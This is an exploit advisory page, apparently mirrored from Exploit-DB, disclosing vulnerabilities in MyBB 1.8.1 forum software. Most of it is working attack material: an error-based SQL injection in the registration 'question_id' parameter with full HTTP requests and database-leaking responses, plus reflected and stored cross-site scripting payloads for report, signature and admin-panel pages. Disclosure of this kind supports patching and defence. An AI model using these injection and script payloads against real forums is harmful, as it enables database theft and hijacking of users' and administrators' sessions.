MyBB 1.8.x – Multiple Vulnerabilities

  • 作者: smash
    日期: 2014-11-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35224/
  • #Title: MyBB 1.8.X - Multiple Vulnerabilities
    #Date: 13.11.2014
    #Tested on: Linux / Apache 2.2 / PHP 5 (localhost)
    #Vendor: mybb.com
    #Version:=> 1.8.1 - Latest ATM
    #Contact: smash@devilteam.pl
    #Author: Smash_
    
    
    Latest MyBB forum software suffers on multiple vulnerabilities, including SQL Injection and Cross Site Scripting. Such bugs may allow attacker to perform remote sql queries against the database, and so on.
    
    Sanitize your inputs ;)
    
    
    1. SQL Injection
    
    Vuln:
    POST 'question_id' - ID'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#
    
    #1 - Request (question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#):
    POST /mybb-1.8.1/member.php HTTP/1.1
    Host: localhost
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 408
    
    regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register
    
    #1 - Response:
    HTTP/1.1 503 Service Temporarily Unavailable
    Date: Thu, 13 Nov 2014 15:16:02 GMT
    		<div id="content">
    			<h2>MyBB SQL Error</h2>
    
    			<div id="error">
    				<p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>
    <dt>SQL Error:</dt>
    <dd>1054 - Unknown column '9' in 'order clause'</dd>
    <dt>Query:</dt>
    			SELECT q.*, s.sid
    			FROM mybb_questionsessions s
    			LEFT JOIN mybb_questions q ON (q.qid=s.qid)
    			WHERE q.active='1' AND s.sid='C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' ORDER BY 9#'
    		</dd>
    
    
    #2 - Request (question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#):
    POST /mybb-1.8.1/member.php HTTP/1.1
    Host: localhost
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 409
    
    regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register
    
    #2 - Response:
    HTTP/1.1 200 OK
    Date: Thu, 13 Nov 2014 15:21:15 GMT
    (...)
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- start: member_register -->
    <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <title>Forums - Registration</title>
    
    
    #3 - Request (Final POC):
    POST /mybb-1.8.1/member.php HTTP/1.1
    Host: localhost
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 475
    
    regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register
    
    #3 - Response:
    HTTP/1.1 503 Service Temporarily Unavailable
    Date: Thu, 13 Nov 2014 15:24:34 GMT
    (...)
    		<div id="content">
    			<h2>MyBB SQL Error</h2>
    
    			<div id="error">
    				<p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>
    <dt>SQL Error:</dt>
    <dd>1062 - Duplicate entry 'mybb:1' for key 'group_key'</dd>
    <dt>Query:</dt>
    <dd>
    			SELECT q.*, s.sid
    			FROM mybb_questionsessions s
    			LEFT JOIN mybb_questions q ON (q.qid=s.qid)
    			WHERE q.active='1' AND s.sid='-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1#'
    		</dd>
    </dl>
    (...)
    
    
    
    2. Cross Site Scripting
    
     a) Reflected XSS - Report post
    
    Vuln:
    GET 'type' - XSS"><script>alert(666)</script>
    
    localhost/mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1
    
    Request:
    GET /mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1 HTTP/1.1
    Host: localhost
    
    Response:
    HTTP/1.1 200 OK
    Set-Cookie: sid=27ec1f0b75b3c6b9d852e6614144a452; path=/mybb-1.8.1/; HttpOnly
    Content-Length: 1247
    Content-Type: text/html
    
    <div class="modal">
    <div style="overflow-y: auto; max-height: 400px;" class="modal_0">
    <form action="report.php" method="post" class="reportData_0" onsubmit="javascript: return Report.submitReport(0);">
    <input type="hidden" name="my_post_key" value="c08308117fcadae6609372f46fa97835" />
    <input type="hidden" name="action" value="do_report" />
    <input type="hidden" name="type" value="XSS"><script>alert(666)</script>" />
    <input type="hidden" name="pid" value="0" />
    
    
     b) Stored XSS - Signature
    
    Vuln:
    POST 'signature' - 
    
    #1 - Request (change signature):
    POST /mybb-1.8.1/usercp.php HTTP/1.1
    Host: localhost
    Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 203
    
    my_post_key=c08308117fcadae6609372f46fa97835&signature=%5Bvideo%3Dyoutube%5Dhttp%3A%2F%2Fyoutube.com%3F%22+xss%3D%22true%22+666%3D%22%5B%2Fvideo%5D&updateposts=0&action=do_editsig&submit=Update+Signature
    
    #2 - Request (user's profile):
    GET /mybb-1.8.1/member.php?action=profile&uid=2 HTTP/1.1
    Host: localhost
    Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig
    
    #2 - Response:
    HTTP/1.1 200 OK
    Set-Cookie: sid=e68f1b6fab0737d7057b546e24d8106e; path=/mybb-1.8.1/; HttpOnly
    Content-Length: 12740
    Content-Type: text/html; charset=UTF-8
    (...)
    <table border="0" cellspacing="0" cellpadding="5" class="tborder tfixed">
    <tr>
    <td class="thead"><strong>user's Signature</strong></td>
    </tr>
    <tr>
    <td class="trow1 scaleimages">[Video: <a href="http://youtube.com?" xss="true" 666="" target="_blank">http://youtube.com?" xss="true" 666="</a>]</td>
    </tr>
    </table>
    <br />
    
    
     c) Reflected XSS - Templates (AP)
    
    Vuln:
    GET 'title' - title"><script>alert(666)</script>
    
    localhost/mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar"><script>alert(666)</script>&sid=1&expand=1
    
    Request:
    GET /mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar%22%3E%3Cscript%3Ealert(666)%3C/script%3E&sid=1&expand=1 HTTP/1.1
    Host: localhost
    
    Response:
    HTTP/1.1 200 OK
    (...)
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head profile="http://gmpg.org/xfn/1">
    	<title>Editing Template: calendar"><script>alert(666)</script></title>
    
    
     d) Reflected XSS - Languages (AP)
    
    Vuln:
    GET 'file' - <a onmouseover=alert(666)>woot
    
    localhost/mybb-1.8.1/admin/index.php?module=config-languages&action=edit&lang=english&editwith=&file=<a onmouseover=alert(666)>woot
    
    Request:
    GET /mybb-1.8.1/admin/index.php?module=config-languages&action=edit&lang=english&editwith=&file=%3Ca%20onmouseover=alert(666)%3Ewoot HTTP/1.1
    Host: localhost
    
    Response:
    HTTP/1.1 200 OK
    (...)
    <a href="https://www.exploit-db.com/exploits/35224/index.php?module=config-languages">Languages</a> » <a href="https://www.exploit-db.com/exploits/35224/index.php?module=config-languages&action=edit&lang=english">English (American)</a> » <span class="active"><a onmouseover=alert(666)>woot</span>
    (...)
    <div class="title"><a onmouseover=alert(666)>woot</div>